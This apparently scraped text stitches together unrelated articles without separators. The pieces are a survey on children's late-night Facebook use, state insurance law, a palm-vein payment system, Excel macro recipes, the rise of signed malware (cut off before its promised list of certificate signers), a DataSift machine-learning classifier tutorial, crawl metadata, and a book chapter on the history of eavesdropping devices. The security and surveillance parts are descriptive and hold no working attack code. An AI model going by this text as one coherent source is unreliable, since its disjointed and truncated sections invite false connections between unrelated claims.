Of the three activities that contribute to an increase in security threats, late night usage is highlighted as a major factor. According to the survey, children who are active on Facebook after midnight are exposed to more risks, and experience almost twice as many problems as users who log out before midnight.
These late-night users – which the study calls Facebook’s “Wild Children” – are four times more likely to have large friend networks, consisting largely of individuals whom the users have never met in person.
Alarmingly, 60% of Facebook “Wild Children” report having experienced serious problems including cyberbullying, account hacking, and unwanted attention from strangers.
43% of children on Facebook have experienced at least one serious problem:
- Problems may include cyberbullying, hacked accounts and unwanted attention from strangers.
- 40% of children take Facebook quizzes / play Facebook games that access personal information.
- 33% of children have Facebook friends they have never met.
Almost 25% of children surveyed are active on Facebook after midnight – Facebook’s “Wild Children”:
- Many “Wild Children” are still online after 3am.
- Children online after midnight are four times more likely to have extremely large friend networks.
- 44% of Facebook “Wild Children” have Facebook friends they have never met in person.
- 40% of Facebook “Wild Children” have Facebook friends who do not know any of their other friends.
Facebook “Wild Children” experience twice as many serious problems:
- 60% report serious problems on Facebook
- 15% report they have been approached by strangers
- 20% report they have been cyberbullied
- Despite these problems, 30% say they are unconcerned about the dangers on Facebook
- And 30% have done nothing to improve their privacy.
The complete report is available here.
It may come as no surprise that Property and Casualty insurance varies from state to state, but were you aware that these differences aren't just circumstantial? In fact, most states go as far as to enact specific laws they believe will best protect their citizens or aid insurance providers that create employment and economic revenue. Such legislative actions have significant impacts on how insurance products are ultimately sold and managed.
Are the Differences Major?
In general, Property and Casualty insurance offers protection against a range of property risks, such as fire, flooding, earthquakes and boiler leaks. One thing you might have noticed when examining contracts, however, is the fact that some risk situations are outright excluded from coverage.
For instance, if a consumer lives in a state like Massachusetts, their insurance may automatically come with a storm damage clause. Because the likelihood of storm damage is generally perceived to be rare, insurance company lobbyists may not have campaigned against the inclusion of such terms.
In states like South Carolina, on the other hand, the routine occurrence of severe weather systems may mean that consumers have to purchase separate hurricane coverage for such events. Notably, Florida has enacted laws designed to change the way insurance works and support state-run providers in light of local proclivities for natural disasters. Some private insurance firms have even quit offering coverage in these areas as a result, and the corpus of legislation impacting how products may be sold is continually expanding.
Defining Key Terms
Also remember that although they're commonly grouped together, Property insurance and Casualty insurance are different. Property insurance is designed to protect businesses or individuals who have invested in the property itself, while Casualty insurance provides them with legal liability protection in case someone else incurs a property loss or an injury.
Because state laws vary drastically when it comes to tort law and liability proceedings, it's quite possible that a state may require specific endorsements and minimum deductibles for policies to be valid. Quantified minimums are common, and they may also be accompanied by special stipulations pertaining to business consumers, such as New Jersey's Temporary Disability Benefits Law and various worker compensation laws enacted throughout the nation. Due to the unique history of insurance laws in any given state, it's usually critical to study specific codes and statutes in order to gain a better understanding of the variances.
Students in southern Sweden have developed a biometric payment system that can be used to buy things simply by placing a palm on a screen.
The biometric reader that the system is built around emits infrared light that is absorbed by the veins in the palm. The vein pattern is subsequently analysed by the terminal to establish the user's identity, and process a payment from a previously linked bank account.
Inventor Fredrik Leifland, a software engineer at Lund University, said he decided to develop a biometric payment solution with several classmates, through a start-up called Quixter, after realising how long card transactions can take.
The technique that underpins their system already existed but until now there has been no system for using it as a form of payment.
"We had to connect all the players ourselves, which was quite complex," said Leifland. "The vein scanning terminals, the banks, the stores and the customers. The next step was finding ways of packaging it into a solution that was user-friendly."
One of the technology's main benefits is security, according to Leifland. "Every individual's vein pattern is completely unique, so there really is no way of committing fraud with this system. You always need your hand scanned for a payment to go through," he said.
In order to sign up to use the hand payment service, a person must visit a store with a terminal, and enter their social security number and phone number. The palm scanner then takes three readings before sending a text message with an activation link from the website. Registration is completed by filling in a form with other information.
There are currently 15 stores and restaurants predominantly around the Lund University campus that use the terminals, with roughly 1,600 active users. Quixter's business model is to take a cut of transactions in the same way that credit card companies do.
Leifland said he plans to expand the idea further, adding there are businesses around the world that are interested.
This story, "Swedish Students Enable People to Buy Cups of Coffee with Their Veins" was originally published by Techworld.com.
If you're not using macros, you're ignoring one of Excel's most powerful features. Macros save you time and spare you headaches by automating common, repetitive tasks. And you don't have to be a programmer or know Visual Basic for Applications (VBA) to write one. With Excel 2013, it's as simple as recording your keystrokes.
Here we'll show you how to create macros for five commonly performed functions.
To record a macro, click Record Macro under the Developer tab. In the Record Macro dialog box, enter the following information and click OK when you're done.
Macro Name --the first character must be a letter, followed by your choice of letters, numbers, or an underscore. No other characters are accepted.
Shortcut Key --CTRL+J and CTRL+M are available. If you choose any other character, your macro will overwrite that key's original function.
Save location --Macros saved in "This Workbook" or "New Workbook" function only in those workbooks. To use in all spreadsheets, save macros to the Personal Macro Workbook (PMW).
Description --Describe the macro.
Because macros perform repetitive tasks, the object is to use them on a lot of different spreadsheets. This means you cannot hard-code the cell addresses (C1, D5, etc.), unless all of the spreadsheets are identical, which means the same number of records in the same columns and rows. To make the macro work on all spreadsheets with similar data, you must use the directional keys to navigate--then, the number of records won't matter--and always begin at the A1 position.
Organize, format, and sort imported data
Data from other programs is often available in TSV or CSV files (Tab- or Comma-Separated Values). Imagine receiving two dozen of these files every month, which have to be organized, unwanted data removed, and then sorted by company name. It takes hours to do a report like that. This macro does it in seconds.
Open the CSV worksheet. Follow the directions above to name, define and save your macro, then record the keystrokes below.
1. Press CTRL+Home to reposition your cursor in cell A1. Hold down the CTRL key and click the letters over the columns you want to eliminate (B through N plus R). Select Home>Delete>Sheet Columns.
2. Hold down the CTRL key and click columns A and D. Select Home>Format>Column Width>42>OK. Hold down the CTRL key and click columns B and C. Select tab Home>Format>Column Width>25>OK.
3. Press CTRL+Home, then CTRL+A (to select all data in the spreadsheet).
Select Home>Sort & Filter>Custom Sort. In the Sort dialog box under Column, choose Name. Under Sort On, choose Values, and under Order, choose A-Z.
4. Select Developer>Stop Recording, and it's finished. Save the worksheet as an Excel file. Open the CSV file again, select Developer>Macros, select the BranchCSV macro from the list, and click Run. The entire worksheet is organized in one second.
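If you would rather script the same cleanup outside Excel, Python's standard csv module can do the column-pruning and sort in a few lines. This is a sketch, not a replacement for the recorded macro; the column names are hypothetical, so substitute your own:

```python
import csv

def clean_branch_csv(in_path, out_path, keep_cols, sort_col):
    """Keep only the wanted columns and sort rows by one column,
    mirroring the delete-columns and custom-sort steps of the macro."""
    with open(in_path, newline="") as f:
        rows = list(csv.DictReader(f))
    rows.sort(key=lambda r: r[sort_col])
    with open(out_path, "w", newline="") as f:
        writer = csv.DictWriter(f, fieldnames=keep_cols, extrasaction="ignore")
        writer.writeheader()
        writer.writerows(rows)
```

Because the script works on whatever header names the file declares, it carries the same benefit as avoiding hard-coded cell addresses: the number of records doesn't matter.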
Split names from one column into two
How many times have you received a long list of names in one column you needed split into two columns, so the first and last name are separated? This macro does it in seconds plus sorts the list, adjusts the column widths, and gives a total list count. Open the Names worksheet, name and define your macro, then record these keystrokes.
1. Press CTRL+Home, CTRL+A. Select Data>Text to Columns. In the first Wizard dialog box, click Delimited>Next. In the second box, choose the character that delimits (separates) your text. Our list is separated by spaces, so check Space>Next. In the last box, click Text>Finish.
2. Press CTRL+Home, then CTRL+A. Select Home>Sort & Filter>Custom Sort. In the Sort dialog, select column B in the Sort By field. Click Add Level, then select column A in the Then By field. For Sort On and Order, leave the defaults Values and A-Z, then click OK.
3. Press CTRL+Home. Press Shift-Right-Arrow to highlight A1 thru B1. Click Format>Column Width>15>OK.
4. Press CTRL+Home. Select Home>Insert Sheet Rows, twice. In A1, type Total Names. Use the right arrow key to navigate to B1, then enter this formula: =COUNTA( and press CTRL+Down-Arrow, End, Shift-Down-Arrow, Enter, CTRL+Home. The total appears in B1.
5. Stop Recording, save the worksheet as Names2. Open the Names file again and run the macro.
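Outside of Excel, the same split, sort, and count takes a few lines of Python. A minimal sketch, assuming every entry is exactly "First Last":

```python
def split_names(names):
    """Split 'First Last' strings into pairs, sort by last name then
    first name, and return the pairs plus a total count."""
    pairs = sorted((n.split(" ", 1) for n in names),
                   key=lambda p: (p[1], p[0]))
    return pairs, len(pairs)
```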
Split column and adjust for middle names
In Excel 2013, it's easy to divide one column of names into two columns, but what if half the list contains middle names/initials and half does not? This macro extracts the middle names/initials entries, rejoins them with the first names, then produces one list with first/middle name in first column and last name in second column. Open a three-names file, name and define your macro, then record these keystrokes.
1. Press CTRL+Home, CTRL+A. Select Data>Text to Columns. In the Wizard boxes, click Delimited>Next, Space>Next, and Text >Finish. One column becomes three.
2. Press CTRL+Home, CTRL+A. Select Home>Sort & Filter>Custom Sort>column C. Press Shift-Right-Arrow. Click Format>Column Width>15>OK.
3. Press CTRL+Home, Right Arrow twice. Press End once, Down-Arrow twice, Right Arrow once--this moves the cursor to the first empty cell in column C, then to the adjacent cell in column D. Type: STOP, press Up Arrow, End, Up Arrow. Type this formula: =A1&" "&B1, then press Enter, Up Arrow.
4. Press CTRL+C, Down-Arrow. Hold down Shift, then press End, Down Arrow, Up Arrow, Enter (copies formula). Press Up Arrow once, hold down Shift, press End, Down Arrow, Up Arrow (this highlights the range without STOP).
5. Press CTRL+C, CTRL+Home, select Paste>Paste Special>Values>OK. Press Escape, CTRL+Home, Right Arrow twice. Hold down Shift, press End, Down Arrow, CTRL+C, Left Arrow, Enter to copy last names. Press Right Arrow, Shift-Right-Arrow.
6. Select Delete>Delete Sheet Columns. Press CTRL+Home. Stop Recording, save the worksheet as 3Names2; open 3Names again and run the macro.
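The trick this macro performs, rejoining first and middle names, reduces to splitting each name on its last space: everything before it is the given name(s), the final word is the surname. A small Python sketch of that rule (it assumes each entry has at least a first and last name):

```python
def split_with_middle(full_name):
    """Split on the LAST space so middle names stay with the first name."""
    first_middle, _, last = full_name.rpartition(" ")
    return first_middle, last
```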
Insert repetitive information
If you're typing the same information 10 times a day, you're begging for a macro. Even if that information is brief, a macro does it in seconds and ensures accuracy. This macro adds your company info to the top of a worksheet and inserts the current date. Open a new worksheet, name and define your macro, then record these keystrokes.
1. Press CTRL+Home. Hold down Shift, then Right Arrow twice. Select Home. From the Alignment group, select Merge Across. Enter this formula in cell A1: =TODAY(), then press Enter and Up Arrow. Select Home>Format>Format Cells>Date. Choose a date format from the list, click OK. Press Down Arrow twice.
2. Type the repetitive information and press Enter at the end of each line. Press Down Arrow. Select Developer>Stop Recording. Delete it all, unmerge cells A1 through A3, then run the macro. Save the worksheet.
Remove Blank Rows
A worksheet filled with blank rows is impossible to manage, sort, or calculate. The first step is to instruct the macro to highlight the spreadsheet data only, then select and remove the blank rows. Once that's accomplished, you can easily manage the data.
Open a file with blank rows, name and define your macro, then record these keystrokes.
1. Press CTRL+Home. Note: CTRL+A will not select all the data when blank rows are in the spreadsheet, but this macro will.
2. Select Home>Insert>Sheet Column. Press End, Down Arrow, Right Arrow, End, Up Arrow. Press CTRL+Shift-Home, Shift-Right-Arrow, CTRL+Shift-Right-Arrow. And the data range is properly selected.
3. Select Home>Find & Select>GoTo Special (or press CTRL+G, ALT+S). Click Blanks>OK and all the blanks highlight in gray. Select Delete>Delete Cells>Shift Cells Up>OK and the blanks vanish. Press CTRL+home, then select Delete>Delete Sheet Column to remove the extra column we inserted to highlight the spreadsheet without hardcoding cell addresses.
4. Stop Recording. Undo all steps, then run the macro. Save the worksheet.
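For data that lives outside Excel, the same blank-row filter is a one-liner in Python. Note one small difference from the macro: GoTo Special selects only truly empty cells, while this sketch also treats whitespace-only cells as blank:

```python
def drop_blank_rows(rows):
    """Keep only rows where at least one cell contains non-whitespace text."""
    return [row for row in rows if any(cell.strip() for cell in row)]
```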
This story, "5 must-know Excel macros for common tasks" was originally published by PCWorld.
Certificate authorities (CAs) have long been used as a trusted means to relay secure access to information via the Internet. CAs provide digital certificates that deliver the information once an application, or binary, is signed and validated by the service provider that owns the content in question. This trust model has worked until cybercriminals started obtaining certificates for malicious signed binaries, or malicious applications, which makes attacks much simpler to execute. When a user relies only on a certificate to bridge trust with a service provider, attackers can simply trick them into trusting a malicious application. When attackers are able to trick administrators and users into trusting a malicious program, they can easily evade and circumvent security software.
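To make the trust problem concrete, here is a deliberately simplified Python sketch of the two checks a verifier combines: integrity (does the binary's digest match a known-good value?) and identity (is the signer actually trusted?). Real code signing uses X.509 certificates and asymmetric signatures rather than a digest allowlist, and the names here are invented for illustration:

```python
import hashlib

TRUSTED_SIGNERS = {"Example Software Inc."}  # hypothetical allowlist

def should_run(binary_bytes, signer, known_good_digests):
    """Toy policy: run a binary only if its digest is known-good
    AND the identity that signed it is one we trust."""
    digest = hashlib.sha256(binary_bytes).hexdigest()
    return signer in TRUSTED_SIGNERS and digest in known_good_digests
```

The point of the sketch is the second condition: a technically valid signature from a stolen or untrusted identity proves nothing by itself, which is exactly the gap signed malware exploits.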
During the last quarter of 2013, McAfee Labs researchers discovered that malicious signed binaries have skyrocketed, reaching unprecedented numbers in more complex and advanced methods than previously recorded. During the fourth quarter of 2013, researchers found more than 2.3 million new malicious signed binaries — a 52% increase from just the third quarter. Throughout all of 2013, nearly 5.7 million new malicious signed binaries were discovered, which was more than triple the amount found in 2012.
This jump in malicious signed binaries can lead to dire consequences for application users. If these numbers remain on an increasing path, users will no longer be able to rely on certificate authorities. Users will instead need to rely on the reputation of the vendor who signed the binary, and on that vendor's ability to secure its data. If this is the ultimate result, the certificate authority model risks becoming obsolete.
Signed malware as a whole originates from stolen, purchased, or altered certificates. More specifically, though, this malware is growing at a faster rate with help from suspicious content distribution networks (CDNs). These websites allow developers to either upload programs or URLs that link to external applications, and then discreetly wrap the code in a signed installer. These CDNs offer attackers a channel for distributing their malware and disguise developers’ intentions.
Additionally, researchers were able to trace some of the malicious signed binaries back to a group of the most used CDNs. While narrowing down the list is important, it does not completely solve the problem since there are many other certificates linked to other CDNs. However, recognizing the pattern by malicious developers explains the recent and rapid growth of signed malware.
The list below shows the top certificate signers that were associated with malicious signed binaries in 2013 and their percentage of all malicious signed binaries:
Richard Caudle | 29th January 2014
Recently I've covered the tagging and scoring features of DataSift VEDO. My post on scoring gave a top level overview and a simple example, but might have left you hungry for something a little more meaty. In this post I’ll take you through how we’ve started to build linear classifiers internally using machine learning techniques to tackle more complex classification projects. This post will explain what a linear classifier is, how it can help you and give you a method to get you started building your own.
What Is A Linear Classifier?
Until now you’re likely to have relied on boolean expressions, written by inspecting data by eye, to categorise your social data. A linear classifier, made possible by our new scoring features, allows you to categorise data based on machine learned characteristics over much larger data sets.
A linear classifier is a machine learned method for categorising data. Machine learning is used to identify key characteristics in a training set of data and give each characteristic a weighting to reflect its influence. When the resulting classifier is run against new data, each piece of data is given a score for how likely it is to belong in each category. The category with the highest score is considered the most appropriate category for the new piece of data.
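To make that concrete, here is a minimal sketch with made-up categories, features and weights (a real classifier learns thousands of weighted features from training data): each category scores an interaction by summing the weights of the features it contains, and the highest score wins.

```python
# Hypothetical feature weights for two categories; a real classifier
# learns these from the training set.
WEIGHTS = {
    "rant": {"refused": 2.1, "thanks": -1.5, "worst": 1.8},
    "rave": {"refused": -1.0, "thanks": 2.4, "worst": -0.7},
}

def classify(text):
    """Score each category by summing the weights of matched features,
    then pick the category with the highest score."""
    words = text.lower().split()
    scores = {
        category: sum(w for feature, w in features.items() if feature in words)
        for category, features in WEIGHTS.items()
    }
    return max(scores, key=scores.get), scores

best, scores = classify("Landing during storm, saved by EasyJet pilot, thanks")
print(best)  # -> rave
```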
Linear classifiers are not the most advanced or accurate method of classification, but they are a good match for high volume data sources due to their efficiency and so are perfect for social data. The accuracy of the classifier depends greatly on the definition of the categories, quality and size of the training set and effort to iteratively improve results through tuning.
For this post I will concentrate on how we built the customer service routing classifier in our library. This classifier is designed to help airlines triage incoming customer requests.
Before I start, a note: we use Python for our data science development work. To make use of our scripts you’ll need the following setup:
- Python development environment (version 2.7 or above)
- Scikit Learn modules (http://scikit-learn.org/stable/install.html)
To build a classifier you’ll need to carry out the following steps:
- Define the categories you want to classify data into and the data points you need to consider
- Gather raw data for the training set
- Manually classify the raw data to form the training set
- Use machine learning to identify characteristics and generate scoring rules
- Test the rule set and iterate to improve the classifier’s accuracy
Let’s look at each of these in detail.
1. Define Your Categories & Targets
The first thing you need to consider is what categories are you going to classify your data into. It is essential to invest time upfront considering the categories, and to write for each a strong definition and include a few examples. The more precise and considered you can be here, the more efficient the learning process can be and the more useful your classifier will become.
Make sure your categories are a good fit for their eventual use. You must make sure that no categories overlap and that, between them, your categories cover all possible interactions. So for example you might want to include an 'other' category as we did below.
For the airline classifier, we spent a good amount of time looking into the kind of conversations that surround airline customer services and were inspired by this Altimeter study. We wanted to demonstrate how conversations could be classified for handling by a customer services team.
The categories we finally decided on were:
- Rant: An emotionally charged criticism that may damage brand image
- “After tweeting negative comment about EasyJet, I have been refused boarding! My rights has been violated!!!”
- Rave: Thanks or positive opinion about flight or services
- “Landing during storm, saved by EasyJet pilot, thanks”
- Urgency: Request for resolving a real-time issue, including compensation
- “EasyJet Flight cancelled. I demand compensation now!”
- Query: A polite or neutral question about how to contact the company, use the website, print boarding card etc.
- “Where can I find EasyJet hand luggage dimensions?”
- Feedback: Statement about the flight or service, relating to how it could be improved, including complaints for delays without big anger.
- “Dear EasyJet, how about providing WiFi onboard”
- Lead: Contact from a customer interested in purchasing a ticket or other product/service in the near future
- “EasyJet, do you sell group tickets to Prague?”
- Others: Anything that doesn’t fit into the categories above
As you might outsource the training process (explained later) to a third party or to colleagues, clear definitions are extremely important.
With your categories defined, you now need to consider what fields of your interactions should be considered. For our classifier we decided that the interaction.content target contained the relevant information.
2. Gather Data For The Training Set
To carry out machine learning you will need to feed the algorithm a set of training data which has been classified by hand. The algorithm will use this data to identify features (keywords and phrases) that influence how a piece of content is classified.
To form the training set you can extract data from the platform (by running a historic query or recording a stream) and then manually put each interaction into a category. If you choose to use our scripts, use one of our push destinations to collect data as a JSON file, choosing the JSON newline-delimited format.
To gather raw data for our airline classifier we used the following filter:
We ran this filter as a historic query to collect a list of 2000 interactions as an initial training set. Of course the more data you are able to manually classify, the higher quality your final classifier is likely to be.
NOTE: Remember to remove any duplicates from the dataset you extract. DataSift guarantees to deliver each interaction at least once: if there is a push failure we will try to push the data again, and you may receive duplicate interactions. If you are on a UNIX platform you can remove duplicates at the command line:
sort raw.json | uniq > deduped.json
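The command-line approach only removes byte-identical lines. A safer approach — a sketch, assuming the newline-delimited JSON schema with an `interaction.id` field — is to deduplicate on the interaction id itself:

```python
import json

def dedupe_lines(lines):
    """Yield only the first occurrence of each interaction id from
    newline-delimited JSON records."""
    seen = set()
    for line in lines:
        iid = json.loads(line)["interaction"]["id"]
        if iid not in seen:
            seen.add(iid)
            yield line

# Example: stream a raw file through the filter.
# with open("raw.json") as src, open("deduped.json", "w") as dst:
#     dst.writelines(dedupe_lines(src))
```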
3. Manually Classify Data To Form The Training Set
Now that you have a raw set of data, the interactions need to be manually assigned categories to form the training set.
As you are likely to have thousands of data points to classify, you may want to outsource this work. This is why it is vital to have well-written definitions of your categories. We chose Airtasker to outsource the work. The advantage we found with Airtasker was that we had assigned workers whom we could communicate with and give feedback to.
We reformatted the raw JSON data as a CSV file to pass to our workers. The file contained the following fields:
- interaction.id - Used to rejoin the categories back on to the original interactions
- interaction.content - The field that the worker needs to examine
- Category - to be completed by the worker
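The reformatting step can be sketched in Python (using the field names above; the empty Category column is left for the worker to fill in):

```python
import csv
import json

def worker_rows(lines):
    """Build CSV rows (id, content, empty category) from
    newline-delimited JSON interactions."""
    rows = [["interaction.id", "interaction.content", "Category"]]
    for line in lines:
        interaction = json.loads(line)["interaction"]
        rows.append([interaction["id"], interaction["content"], ""])
    return rows

# Writing the file to hand to the workers:
# with open("raw.json") as src, open("tasks.csv", "w", newline="") as dst:
#     csv.writer(dst).writerows(worker_rows(src))
```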
Again, as with the training set size, the more effort you can spend here the better the results will be. You might want to consider asking multiple people to manually classify the data and correlate the results. Even with well-written definitions, two humans may disagree on the right category.
With the results back from Airtasker we now had a raw set of interactions (as a JSON file) and a list of classified interactions (as a CSV file). These two combined formed our training set.
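Once the workers' CSV comes back, joining it onto the raw interactions — again a sketch over the same hypothetical field names — looks like this:

```python
import json

def build_training_set(json_lines, csv_rows):
    """Join worker-assigned categories back onto interactions by id.

    `csv_rows` is an iterable of dicts, e.g. from csv.DictReader.
    Returns parallel lists of texts and category labels.
    """
    labels = {row["interaction.id"]: row["Category"] for row in csv_rows}
    texts, categories = [], []
    for line in json_lines:
        interaction = json.loads(line)["interaction"]
        if interaction["id"] in labels:
            texts.append(interaction["content"])
            categories.append(labels[interaction["id"]])
    return texts, categories
```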
4. Generating A Classifier
With a training set in place the next step is to apply machine learning principles to generate rules for the linear classifier, and generate CSDL scoring rules to implement the classifier.
We implemented the algorithm in Python using the scikit-learn libraries, and the source is available here on GitHub.
At a high level the algorithm carries out these steps:
- For each interaction in the training set, consider the target fields (in this case interaction.content)
- Split into two sets, the first for training, the second for testing the classifier later
- For each training interaction
- Chunk the content into words and phrases
- Build a list of candidate features to be considered for rules
- Add / remove features based on domain knowledge (see below)
- From the list of features select those with the most influence
- Generate the classifier based on the selected features, and the interactions that match these features
- Test the classifier against the training interactions and output results as a confusion matrix
- Test the classifier against the testing interactions put aside earlier
- For each, log the expected and actual categories assigned
- Output the overall results as a confusion matrix
- Generate CSDL scoring rules from the classifier
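The core of those steps can be sketched with scikit-learn — a simplified illustration, not our production script (see the GitHub repository for the real thing):

```python
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import confusion_matrix
from sklearn.model_selection import train_test_split
from sklearn.pipeline import make_pipeline

def train_classifier(texts, categories):
    """Fit a linear model on word/phrase features and report a
    confusion matrix on held-out interactions."""
    train_x, test_x, train_y, test_y = train_test_split(
        texts, categories, test_size=0.25, random_state=0)
    model = make_pipeline(
        TfidfVectorizer(ngram_range=(1, 2)),  # words and two-word phrases
        LogisticRegression(),
    )
    model.fit(train_x, train_y)
    print(confusion_matrix(test_y, model.predict(test_x)))
    return model
```

From here, the learned feature weights would be translated into CSDL scoring rules, which is what our script does.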
The script takes in a raw JSON file of interactions (unclassified) and a CSV of classified interactions, matching the method I’ve explained. You can also specify keywords and phrases to include or exclude as an override to the automatically selected features.
See the GitHub repository for instructions on how to use the script.
The script allows you to specify keywords and phrases that must or must not be considered when generating the classifier. This allows you a level of input into the results based on human experience.
For example, we specified that the following words should be considered for the airline classifier, as we knew they would give us a strong signal:
5. Perfecting The Classifier
Your first classifier might not give you a great level of accuracy. Once you have a method working, you may need to spend considerable time iterating and improving your classifier.
You might want to extract a larger set of training data or you may wish to add or remove keywords as you learn more about the data.
The script also allows you to manipulate the parameters passed to the statistical algorithms. Refining these parameters can produce significantly different results.
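One common way to explore those parameters — again a sketch, assuming the scikit-learn stack the script is built on — is a grid search over settings such as the n-gram range and the regularisation strength:

```python
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import GridSearchCV
from sklearn.pipeline import Pipeline

def tune(texts, categories):
    """Search a small parameter grid with cross-validation and
    return the best estimator and its parameters."""
    pipeline = Pipeline([
        ("tfidf", TfidfVectorizer()),
        ("clf", LogisticRegression()),
    ])
    grid = {
        "tfidf__ngram_range": [(1, 1), (1, 2)],  # words vs. short phrases
        "clf__C": [0.1, 1.0, 10.0],              # regularisation strength
    }
    search = GridSearchCV(pipeline, grid, cv=2)
    search.fit(texts, categories)
    return search.best_estimator_, search.best_params_
```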
I hope this post has given you some insight into building a machine learned classifier. It is impossible to give a foolproof, turnkey method, as use cases vary so wildly.
As I said in the introduction, linear classifiers are suited to social data because of their efficiency. You may need to invest significant time perfecting your classifier; this is the nature of machine learning.
Check out our library for more examples of classifiers. We’ll be adding more linear classifiers soon!
To stay in touch with all the latest developer news please subscribe to our RSS feed at http://dev.datasift.com/blog/feed | <urn:uuid:54903a0b-a4ab-494d-b289-4b25396f6dcd> | CC-MAIN-2017-09 | http://dev.datasift.com/blog/how-apply-machine-learning-and-give-social-data-meaning | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171932.64/warc/CC-MAIN-20170219104611-00060-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.88732 | 2,217 | 2.734375 | 3 |
THE OMINOUS EAR
by Bernard B. Spindel
Chapter 17. - Technical Aspects
The telephone instrument dates back to the early 1880’s. Wiretapping devices in existence at that time were extremely crude and basic – a condenser-equipped telephone earpiece through which one was effectively able to monitor a communication. During Prohibition the wiretapper graduated to the use of headphones for monitoring. To the present day, these two devices remain as basic and crude wiretapping instruments.
With the advent of radio and in the early 1930’s, when the vacuum-tube amplifiers became commonplace and the loud-speaker replaced the old horn-type speaker, life became much easier for the wiretapper. In the early 1930’s, the magnetic recording head became less expensive, and recording discs were added to the wiretapper’s tool kit and accompanied the man with the headset as a replacement for the stenographer’s notebook.
During World War II, the development of magnetic wire recording, together with the miniaturization of electronic tubes, made possible smaller, lighter and far more efficient eavesdropping devices. The high-gain amplifiers and associated components – fast becoming cheaper and easier to obtain because of mass production methods – made even more equipment available at lower prices.
In the late 1940’s, magnetic tape recorders were introduced and the transistor replaced the bulky vacuum tubes and heavy and costly power supplies. The equipment shrank from shoe-box size to the size of a package of cigarettes.
In 1955, I testified before a Congressional Committee that each of the more than fifty million telephones in the United States could, with the attachment of one wire, be converted into live microphones that conducted sound even when the phone was not in use. Such a microphone could pick up a whisper within thirty-five feet of the telephone and send the signal over telephone wires to a listening post where, at the first sound, a recorder would turn itself on and then turn itself off when the voice was no longer to be heard. This is known as a “voice-actuated stop-and-start” mechanism. Late in the 1940’s I developed the first undetectable, fully automatic telephone stop-and-start mechanism that turned the recorder on and off when the subject’s phone was lifted out of the cradle. It then recorded both sides of the conversation and automatically stopped running when the telephone was hung up. It was at this time that I built the first recorder capable of operating for fifty hours without wasted tape because it was activated only while a conversation was actually taking place.
Law enforcement and professional eavesdroppers were quick to pick up old or new technical principles and adapt them for eavesdropping purposes. I testified and demonstrated before the Committee in 1955 that a parabolic microphone – and there were numerous types and models available at that time – could, without the use of any wires or a radio transmitter, pick up the conversation of people in a rowboat out in the middle of a lake, and record it on shore.
Highly sensitive phone cartridges were developed, and these were adapted and utilized as contact microphones to pick up conversations through walls and into other rooms. Along came especially designed microphones that did this job even better. Electronics progressed and special filters became available which could eliminate background noises and limit the input to eavesdrop equipment by concentrating only on sounds of the human voice. Such efficiency is now improving to a point that background noises from cars, trucks, etc., are almost entirely eliminated.
As eavesdropping has graduated from science to art, specialized devices have been produced specifically for this field. A prime example is the non-magnetic microphone developed by the Russians. More than forty of these were installed within the walls of our Embassy in Moscow when the building was being constructed. Our State Department maintains a special staff of technicians trained and equipped to detect such devices. However, these microphones contained no metal. They were of ceramic construction and had hollow wooden tubes through which sounds originating in a particular room were transmitted through walls.
The search equipment used to detect buried wires and microphones of normal type is similar to that used in mine detectors. A tracing of a wall with one of these devices indicates every wire, nail or strip of metal buried within, but it failed to indicate the Russians’ ceramic microphones, which remained intact inside the Embassy walls for eleven years. Only the information passed along by a defector who became an informant alerted us to the fact that Embassy conversations were being leaked. In total frustration, it was decided to tear the walls apart in a desperate attempt to find the microphones.
The walls of one room were ripped out and the existence of these mikes was finally revealed.
In my testimony in 1955, I had warned the Congress that experiments indicated that it was already possible to take the conversation out of a room without benefit of wires, without benefit of radio as we knew it then, and without the need to install any device – in fact, without ever entering the particular room to be bugged.
Directly following this testimony, the Russians displayed their electronic prowess by utilizing a rather old principle based on what is known as a cavity resonator. A replica of the American eagle was presented as a gift to U.S. Ambassador Harriman. The Ambassador proudly placed it in his own office. Buried in the eagle was a transducer – a piece of metal about the size of a half-dollar, with no connecting wires. By beaming a high-frequency signal from a distance, aimed directly at the room containing the transducer, conversations taking place within the room were reflected back to the listening post. Again our State Department security agents did not detect this apparatus until they were alerted to its presence by other sources.
When I made the disclosure of this type of technology to the Congressional Committee, scientists in government and in private industry did not know what I was talking about; still others maintained the usual “will not confirm or deny” attitude and, in effect, pooh-poohed my testimony. Actually, the device to which I referred involved a principle that has never been scientifically documented, and I have never divulged the technology behind it through fear that even in official hands it might be misused against private citizens.
Sub-miniaturized devices capable of sending a signal on infra-red light beams which are invisible to the human eye, and traveling long distances without the need of radio or wires, have made novel transmissions of eavesdrops a reality. In order to detect these beams, one must either find the unit itself or be in a position to find the exact angle at which they are being emitted. They travel in the same way as do beams from a powerful searchlight. Furthermore, the use of such a device does not come under any rules or regulations or laws of the Federal Communications Commission.
A more sophisticated device is the cesium transmitter and receiver. In its pure form, cesium is a rare metal and expensive. There are standard cesium lamps which transmit light similar in characteristics to micro-radio waves. This light is limited to the line of sight as covered by the permissible distance one would encounter in the curvature of the earth to the horizon. Some interesting experiments with miniaturized cesium transmitters have permitted these light waves to go beyond the horizon by aiming them upward into the sky where, regardless of the atmosphere, they act as a mirror to a searchlight, thus transmitting the signal for many more miles than had previously been believed possible.
We have all been accustomed to remote-control garage door openers, activated by pushing a button in the car as we approach the garage, causing the doors to open and the driveway lights to go on.
We are equally accustomed to the sonic remote-control device developed by Zenith which enables one to turn a television set on and off, and to even change the channels or adjust volume and picture, without the use of connecting wires. This employs the principle of sonic transmitting signals in the inaudible range between the limits of the human ear and low-frequency radio signals. People were shocked when Life Magazine showed a martini containing an olive which housed a built-in radio transmitter, utilizing the toothpick as an antenna. While this novel device is excellent for illustrating the miniaturization possible in radio transmissions, it is of limited practicality. However, a slightly larger transmitter, the size of a pack of matches, can easily send a signal the distance of several blocks. Concealed under a chair or bed, it can indeed transmit some very interesting signals. The sonic transmitter is equally capable of picking up a whisper in a room and – without any detectable wires or radio signals – transmitting it to a sonic receiver which restores the signal to the audible sound originally picked up by the microphone. This device also eludes the jurisdiction of the FCC and does not violate Federal law.
The Federal government has not yet deemed it advisable, after more than a dozen Congressional hearings, to make it unlawful for one person to eavesdrop on another person.
One can readily understand the problems involved in locating these sophisticated devices while doing a “search.” The problems become even more complex in view of the fact that – at the will of the eavesdropper – all eavesdropping devices can now be turned on and off by remote control.
